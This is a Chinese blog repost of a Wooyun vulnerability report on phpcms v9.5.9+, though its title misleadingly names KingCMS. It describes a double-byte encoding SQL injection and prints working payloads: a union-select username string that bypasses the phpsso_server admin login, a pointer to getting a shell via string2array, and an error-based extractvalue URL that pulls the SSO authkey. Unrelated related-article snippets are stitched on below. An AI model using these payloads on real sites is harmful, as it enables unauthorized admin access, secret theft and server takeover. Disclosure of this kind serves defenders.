kingcms php 漏洞,phpcmsV9.6 getshell

最新推荐文章于 2023-01-29 00:48:28 发布
最新推荐文章于 2023-01-29 00:48:28 发布
阅读量293 收藏
点赞数
文章标签: kingcms php 漏洞

这个漏洞来自乌云,经过本地环境测试后,发现漏洞确实存在。

a614337c90d0f7108b4a62cae64b2ff9.png

详细说明:

PHP双字节编码,这个本不应该出现的问题,或许因为过去太久远快被遗忘了,phpcms从20140929的v9.5.9版本起,增加了mysqli的支持,因为编写疏忽,导致该问题又重现江湖。漏洞本身无需细说。phpcms默认使用mysqli数据库,显示mysql语句错误(debug为true,呵呵完全可以爆错注入),而且安装过程不能修改。

漏洞影响:利用20140929的v9.5.9以后版本新建站点,以前版本升级的不受影响,故自评Rank为15

漏洞危害:利用漏洞直接登陆phpsso_server后台获取shell、注入等。

1、登陆登陆phpsso_server后台

code 区域

用户名:誠’ union select 1,0x706870636D73,0x3831346539303966363566316439313263646237636333393833623934333239,4,1,6,7 — k

密码:1

7710a4771a1df03907566cead3fcec24.png

2、利用phpsso_server/phpcms/modules/admin/messagequeue.php页面的string2array函数获取shell。测试代码另存为html文件,登陆phpsso_server后,提交即可。测试时,请修改form的action属性。

3、注入。访问链接:**.**.**.**/phpcmsv9/index.php?m=pay&c=respond&a=respond_get&code=kkk%89′ and extractvalue(1, concat(0x7e, (select substr(authkey,1,30) FROM v9_sso_applications where appid=1),0x7e))–%20m

50355e4b46b6fa82c59b57e8a1d7a4eb.png

咖啡碎冰冰
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
KingCMS企业版网站 v6.0.970SP1
03-26
PHP版本5.2+ MySQL5.0+ GD2.0+ 推荐环境 phpStudy1.75或2009 目录介绍 uploadKingCMS安装文件目录 _demoKingCMS演示模板 完整的帮助 已内置到系统中,安装系统后可看到 帮助中心基础操作方面的帮助 模板标签模板制作...
asp.net mvc post 后台model_phpcms v9.6.3 后台几处漏洞分析
weixin_39611769的博客
11-21 262
安装环境windows10 + xmapp xmapp的Apache HTTP端口设为8080调试环境phpstorm + Xdebug + chrome Xdebug helper安装phpcms在xmapp安装文件夹htdocs文件夹内新建一个文件夹,用来放php的程序代码,我的命名习惯是cms名称+版本号,例如在这里我的 命名是phpcms_v9.6.3到phpcms官网下载代码,解压后将...
PHPCMS V9.6.3的后台漏洞分析
weixin_30856725的博客
03-13 1223
PHPCMS V9.6.3后台的漏洞分析 1、利用文件包含创建任意文件getshell 漏洞文件:\phpcmsv9\phpcms\modules\block\block_admin.php 漏洞产生点位于265~272行:    1 if (@file_put_contents($filepath,$str)) { 2 ob_start()...
phpcms最新版_v9.6.3后台getshell
KEY0NE的个人博客
07-13 570
测试环境程序包:phpcms最新版(phpcms_v9.6.3_UTF8)测试工具:Chrome+Developer Tools+BurpSuite Pro运行环境:phpStudy 2016测试过程从官网下载好最新程序包http://download.phpcms.cn/v9/9.6/phpcms_v9.6.3_UTF8.zip,安装到本地测试环境,登录进后台步...
phpcms_v9.5.8后台最低权限getshell
KEY0NE的个人博客
04-09 453
摘要:前提需要一个能登录phpcms后台的账户(无论权限大小),即可直接getshell源码:http://download.phpcms.cn/v9/9.5/phpcms_v9.5.8_UTF8.zip本地搭建进行演示进入-设置-管理员设置-角色管理编辑“发布人员”的权限,添加“我的面板”,不然进不了后台界面添加权限最低的(发布人员)的账户退出-使用test登录...
Phpcms V9.6.0任意文件写入getshell
主题模板站的博客
01-21 535
PHPcms v9.6的任意文件上传的漏洞,已经潜伏半年多的一个漏洞。该漏洞可以在用户注册界面以未授权的情况下实现任意文件上传。phpcms v9.6正常部署phpcms v9.6就好。复现过程中,可以在用户注册页面通过POST提交:在src后面跟上自己shell的url。注意是要.txt格式写的shell。网上已经有逆向分析的过程,这次我来正向的分析一下这个洞。首先看到用户注册的模块,位于phpcms/modules/member/index.php的register方法中。代码很多,一点点往下看:完成了
PHPCMS v9.6 Getshell方法大全
hacker0ne的博客
11-15 5657
phpcms9.6.x后台getshell几种方法
phpcms V9代码审计——后台getshell+sql注入
Zlirving_的博客
02-02 1119
漏洞点 —— 模板写入 在phpcms\modules\dbsource\data.php文件里有个add()函数 在80行有个fileputcontent()函数,将$str写入caches\caches_template\dbsource\$id.php文件当中。追踪$str,首先是查询了数据库的$id行template的值,然后经过template_cache系统类的template_parse方法对模板内容的过滤 phpcms\libs\classes\template_cache.class.p
KingCMS企业版(PHP) v6.1.1641 Sp2
10-25
KingCMS内容管理系统:是一套简单易学,操作简单的开源内容管理系统(CMS),支持PHP+sqLite3/MySQL,此版本为KingCMS正式版的Sp2版。 更新记录 修复,前台comment.php的评论分页无效 修复,后台爬虫管理的统计无效 ...
KingCMS PHP企业版.7z
03-15
KingCMS PHP企业版.7z
KingCMS v6.1 正式版 SP2
05-16
 KingCMS v6.1 SP2更新记录:  修复,前台comment.php的评论分页无效  修复,后台爬虫管理的统计无效  修复,文章录入关键字的分隔规则为英文状态逗号而不是空格  修复,产品模型下的状态属性管理操作无效  ...
KingCMS企业开源类网站 v6.0.813
03-29
开源授权本软件/系统部分遵守GPL,LGPL和MPL等开源代码协议,这些非赢利的开源代码授权用于且仅用于以下目的:继续开发KingCMS,和基于KingCMS开发相关的插件和模板;将KingCMS集成到你的开源程序中;完全的个人非...
kingcms php 列表页bug,kingcms最新版sql注入漏洞
weixin_29355333的博客
04-02 119
api/uc.phpUC_KEY没有初始化导致注入
PHP代码审计6—文件包含漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
07-27 1792
文件包含漏洞整理与历史漏洞分析
记一次phpcms9.6.3漏洞利用getshell到内网域控
plant1234的博客
06-25 2427
首现利用nmap扫描网段收集到主机ip地址: 扫描主机信息: 发现是win7的操作系统和开放80端口直接访问网站: 得到:扫描目录发现管理员登陆: 得到:弱口令:admin admin12345phpcms9.6.3后台getshell的洞网上有很多可以参考这篇博客: https://blog.csdn.net/weixin_42433470/article/details/112409431我这里利用的是:用户->管理员模块->添加会员模型得到shell:用蚁剑连接shell然后利用cs上线:利用的模块
PHPCMS v9本地文件包含漏洞Getshell
fansenliangren的博客
12-01 1425
文件包含是指程序代码在处理包含文件的时候没有严格控制。导致用户可以构造参数包含远程代码在服务器上执行,并得到网站配置或者敏感文件,进而获取到服务器权限,造成网站被恶意删除,用户和交易数据被篡改等一系列恶性后果......
渗透测试-getshell学习总结
lza20001103的博客
08-26 2023
getshell学习总结 文章目录getshell学习总结一、方法分类1.带有漏洞的应用2.常规漏洞3.后台拿shell二、网站常见getshell方法1.数据库备份拿shell2.上传3.修改允许上传类型4.服务器解析漏洞5.编辑器6. 网站配置插马7.上传插件8.数据库执行9.文件包含10. 命令执行三、常见cms后台拿shell1.dedecms一、后台文件上传二、数据库执行拿shell2.南方数据、良精、动易一、数据库备份(备份图片马、备份数据库)1.上传图片马2.审查元素,找到图片马路径3.开始备
PHPCMSv9.6.0前端任意文件上传漏洞分析
红队是青春
01-29 786
PHPCMSv9.6.0前端任意文件上传漏洞代码分析
高级色系PPT11.pptx
05-08
高级色系PPT11.pptx
node-v7.9.0-linux-x86.tar.xz
最新发布
05-08
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值